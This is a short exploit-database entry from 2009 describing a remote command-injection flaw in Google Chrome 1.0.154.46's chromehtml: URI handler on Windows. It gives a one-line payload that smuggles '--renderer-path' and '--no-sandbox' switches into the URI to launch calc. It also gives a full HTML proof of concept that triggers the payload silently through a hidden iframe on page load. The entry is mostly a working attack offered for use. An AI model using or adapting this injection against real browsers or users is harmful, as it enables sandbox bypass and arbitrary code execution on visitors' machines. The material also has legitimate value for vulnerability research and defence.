Google Chrome 1.0.154.46 - '(ChromeHTML://)' Injection

EDB-ID:

7935

CVE:

N/A

Author:

waraxe

Type:

remote

Platform:

Windows

Published:

2009-01-30

Try this:

chromehtml:"%20--renderer-path="calc"%20--no-sandbox

Disabling sandbox does matter  :) 
Tested with Google Chrome Chrome 1.0.154.46 on Win XP/Vista and IE6/IE7 and it works ...

Full PoC:

<html><head><title>Chrome URI Handler Remote Command Execution PoC</title></head>
<body>
<h3>This is a test</h3>
<iframe src='chromehtml:"%20--renderer-path="calc"%20--no-sandbox' width=0 height=0></iframe>
</body></html>

# milw0rm.com [2009-01-30]